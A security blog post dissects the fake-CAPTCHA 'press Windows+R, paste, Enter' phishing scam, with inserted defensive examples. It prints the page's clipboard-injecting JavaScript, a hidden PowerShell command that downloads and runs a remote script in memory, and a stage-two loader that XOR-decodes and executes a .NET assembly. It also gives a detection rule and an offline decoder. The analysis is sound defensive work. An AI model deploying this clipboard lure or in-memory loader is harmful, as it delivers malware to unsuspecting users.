
LitoMore's Mind

How Does the PowerShell Phishing Attack Work

Tags = [ CAPTCHA, PowerShell, Security, Windows ]

You may have heard of the new CAPTCHA scam that asks you to press Windows + R to verify that you are human. A popup walks you through a "verification": press Windows + R, then Ctrl + V, then Enter. You probably already have a rough idea of how it works, but this time let's take a closer look at the actual code.

These scams usually show up on sites like GitHub and Reddit, disguised as ordinary comments, such as the one below:

Maybe this solution will solve your problem click this link: ...

The comment gives you a link, and when you open it the page asks you to complete a CAPTCHA. When you click the CAPTCHA button, a window pops up on the page and asks you to press a set of key combinations to finish the verification. Like this:

Verification Steps:
1 - Press Windows + R
2 - Press Ctrl + V
3 - Press Enter

If you follow the steps they provide, you will fall into their trap.

What happened during this process?

Let's look directly at their code to see what is executed during the process.

First, let's use cURL to fetch the source of the target URL. The real domain is replaced with example.com here so that nobody opens the actual page by accident.

curl https://example.com/captcha.html

Here is the key part of the page we get back:

function open_modal() {
  // The command that will end up on the victim's clipboard
  var copyText =
    "powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://example.com/scam))).Invoke()";
  // Temporary textarea: put the text in it, select it, copy it, then remove it again
  var textarea = document.createElement("textarea");
  textarea.value = copyText;
  document.body.appendChild(textarea);
  textarea.select();
  document.execCommand("copy");
  document.body.removeChild(textarea);
  // Show the "verification steps" modal two seconds later
  setTimeout(() => {
    document.querySelector("#modal").classList.remove("hidden");
  }, 2000);
}

It shows the phishing modal and uses execCommand("copy") to silently place a command on your clipboard. A page cannot write to the clipboard on its own: execCommand("copy") only succeeds during a user gesture such as a click, which is exactly what the fake CAPTCHA button provides. The two-second delay before the modal appears makes the "verification" feel like a real check is running. The copied command starts PowerShell with -WindowStyle Hidden so that no console window appears; irm is the alias of Invoke-RestMethod and fetches the script text from the URL; [ScriptBlock]::Create() turns that text into a script block and .Invoke() runs it, all in memory, without saving a file:

powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://example.com/scam))).Invoke()
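A detection check a defender would want for this launcher, as an added example that is not part of the original post and not the attacker's code. It runs over constructed process-creation events in the shape Sysmon Event ID 1 and Windows Security event 4688 record (parent image, image, command line); the sample events are made up for this example, the first of them being the page's command line typed into the Run dialog, whose parent process is explorer.exe.

```python
# Added example: detection logic for a hidden PowerShell that downloads and
# runs code in memory. Events are constructed samples, not real telemetry.
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    suspicious: bool
    reasons: list[str] = field(default_factory=list)


# -WindowStyle Hidden; powershell.exe also accepts -w and the numeric value 1
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I)
# Cmdlets, aliases and .NET calls that pull content from the network
REMOTE_FETCH = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloaddata)\b", re.I)
# Ways of executing downloaded text without saving it first
INLINE_EXEC = re.compile(r"\[scriptblock\]::create|\biex\b|invoke-expression|\.invoke\(\)", re.I)
URL = re.compile(r"https?://", re.I)


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}


def assess(ev: ProcessEvent) -> Verdict:
    """Flag PowerShell that fetches code over the network and runs it in place.
    A hidden window and an explorer.exe parent (what Win+R uses) are recorded
    as supporting evidence but are not required on their own."""
    if not is_powershell(ev.image):
        return Verdict(False)
    cmd = ev.command_line
    reasons: list[str] = []
    fetch = bool(REMOTE_FETCH.search(cmd) and URL.search(cmd))
    exec_ = bool(INLINE_EXEC.search(cmd))
    if fetch:
        reasons.append("downloads from a URL in the command line")
    if exec_:
        reasons.append("executes downloaded text in memory")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hides its window")
    if ev.parent_image.lower().endswith("\\explorer.exe"):
        reasons.append("started from explorer.exe (Run dialog)")
    return Verdict(fetch and exec_, reasons)


# Constructed sample events (not real logs). The first is the page's command line.
PS5 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS5,
                 "powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://example.com/scam))).Invoke()"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS5, "powershell"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS5,
                 r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 'pwsh -c "iwr https://example.com/x.ps1 | iex"'),
]


def scan(events: list[ProcessEvent]) -> list[tuple[str, Verdict]]:
    """Return (command line, verdict) for every event judged suspicious."""
    hits = []
    for ev in events:
        verdict = assess(ev)
        if verdict.suspicious:
            hits.append((ev.command_line, verdict))
    return hits


if __name__ == "__main__":
    for cmd, verdict in scan(SAMPLE_EVENTS):
        print(f"ALERT: {cmd}\n  " + "; ".join(verdict.reasons))
```

The rule deliberately keys on the combination of a network fetch and in-place execution rather than on the hidden window alone, since legitimate scheduled tasks also hide their windows; the explorer.exe parent is what separates "a user pasted this into Win+R" from a script started by an administrator's tooling.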

Now let's fetch https://example.com/scam and see what it contains:

curl https://example.com/scam
$url = "https://example.com/binary"
$webClient = New-Object System.Net.WebClient
$sell61 = $webClient.DownloadData($url)            # next stage, fetched as raw bytes
$gossip123 = 0x09, 0x04, 0x05                      # 3-byte XOR key
$struggle6 = [byte[]]::new($sell61.Length)

# Repeating-key XOR: byte i is XORed with key[i mod 3]
for ($i = 0; $i -lt $sell61.Length; $i++) {
  $struggle6[$i] = $sell61[$i] -bxor $gossip123[$i % $gossip123.Length]
}

# Load the decoded bytes as a .NET assembly straight from memory (nothing is written to disk)
$afraid16 = [System.AppDomain]::CurrentDomain.Load($struggle6)

# Run its Main() just like starting the program normally
if ($afraid16.EntryPoint -ne $null) {
  $afraid16.EntryPoint.Invoke($null, @($null))
} else {
  Write-Host "glass glimpse glue gloom"
}

The downloaded bytes are a .NET executable XORed with a three-byte key, presumably so that the file served from the server does not look like a program. AppDomain.Load takes a byte array, so the decoded assembly is loaded directly from memory and never touches the disk, and EntryPoint.Invoke runs its Main method exactly as if you had started the program yourself. The random-looking variable names serve the same purpose as the XOR: to keep the script from matching simple signatures. From that point on the attacker's program runs with your user's privileges and can do whatever it wants with your system.
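As an added example (not part of the original post, and not the attacker's code), here is the same decoding step done the way an analyst would do it: in Python, on bytes already captured, without ever loading or invoking the result. The key is the one from the script above. The sample payload is constructed (a DOS header plus filler, not a real executable). It goes one step beyond the page: the key-recovery helper shows that a three-byte XOR key is trivially recovered if the next stage's key is rotated, by assuming the decoded file begins with the typical PE prefix MZ\x90\x00, which is an assumption about the payload rather than a guarantee.

```python
# Added example: offline decoder for the XOR-obfuscated stage above.
# Nothing here executes the payload; it is decoded, sanity-checked and
# optionally written to disk for analysis. Sample bytes are constructed.
from itertools import cycle
from pathlib import Path
from typing import Optional

PAGE_KEY = bytes([0x09, 0x04, 0x05])   # $gossip123 from the attacker's script
# Typical first bytes of a Windows executable (e_magic "MZ", e_cblp 0x0090).
# Assumption used for known-plaintext key recovery; not guaranteed for every PE.
DOS_HEADER_PREFIX = b"MZ\x90\x00"


def xor_decode(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, byte for byte what the script's for loop does."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_pe(blob: bytes) -> bool:
    """Anything AppDomain.Load accepts is a PE file, so it must start with 'MZ'."""
    return blob[:2] == b"MZ"


def recover_key(encoded: bytes, key_len: int, known_prefix: bytes = DOS_HEADER_PREFIX) -> bytes:
    """Known-plaintext attack: if the first key_len plaintext bytes are known,
    key[i] = encoded[i] XOR plaintext[i]. Works for any short repeating key."""
    if key_len > len(known_prefix) or key_len > len(encoded):
        raise ValueError("not enough known plaintext for this key length")
    return bytes(e ^ p for e, p in zip(encoded[:key_len], known_prefix[:key_len]))


def safe_stage2(encoded: bytes, key: Optional[bytes] = None,
                out_path: Optional[Path] = None) -> bytes:
    """Decode the downloaded bytes and optionally save them. Never executes them."""
    if key is None:
        key = recover_key(encoded, len(PAGE_KEY))
    decoded = xor_decode(encoded, key)
    if not looks_like_pe(decoded):
        raise ValueError("decoded blob does not start with MZ: wrong key or not a PE")
    if out_path is not None:
        out_path.write_bytes(decoded)   # hand the file to a sandbox / disassembler
    return decoded


# Constructed sample: a DOS header, padding and the usual stub string, XOR-encoded
# with the page's key the same way the attacker's server would serve it.
SAMPLE_PLAIN = DOS_HEADER_PREFIX + bytes(60) + b"This program cannot be run in DOS mode."
SAMPLE_ENCODED = xor_decode(SAMPLE_PLAIN, PAGE_KEY)   # XOR is its own inverse


if __name__ == "__main__":
    print("recovered key:", recover_key(SAMPLE_ENCODED, 3).hex())
    blob = safe_stage2(SAMPLE_ENCODED, out_path=Path("stage2.bin"))
    print(f"decoded {len(blob)} bytes, starts with {blob[:2]!r}")
```

The point of the MZ check is practical: if a rotated key or a changed encoding breaks the decode, you find out before wasting time in a disassembler, and the file on disk gives AV and sandbox tooling something to look at, which the in-memory load in the original script was designed to avoid.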

Why is the phishing method so effective?

Effective phishing is easy to follow and catches you before you realize what happened. The technique is misdirection: CAPTCHAs and other verification prompts have become so routine that people stop paying attention, and someone without basic computer knowledge has no way to tell that Windows + R opens the Run dialog rather than a verification step. Here is the video The Art of Misdirection if you want to learn more about it.

On the other hand, with the rise of smartphones and tablets, some people have become computer illiterate, especially kids. As a Reddit post on r/Teachers pointed out, more and more students don't know how to use computers. They use their laptops only for schoolwork, and that's really about all you can do with them since the OS is so limited/sandboxed.

These factors combined make this phishing method so effective.

Other similar attacks

Some sellers on the Internet offer Steam games at extremely low prices. They give you a script and ask you to run it. The script installs pirated games on your computer and uses the opportunity to implant malicious code.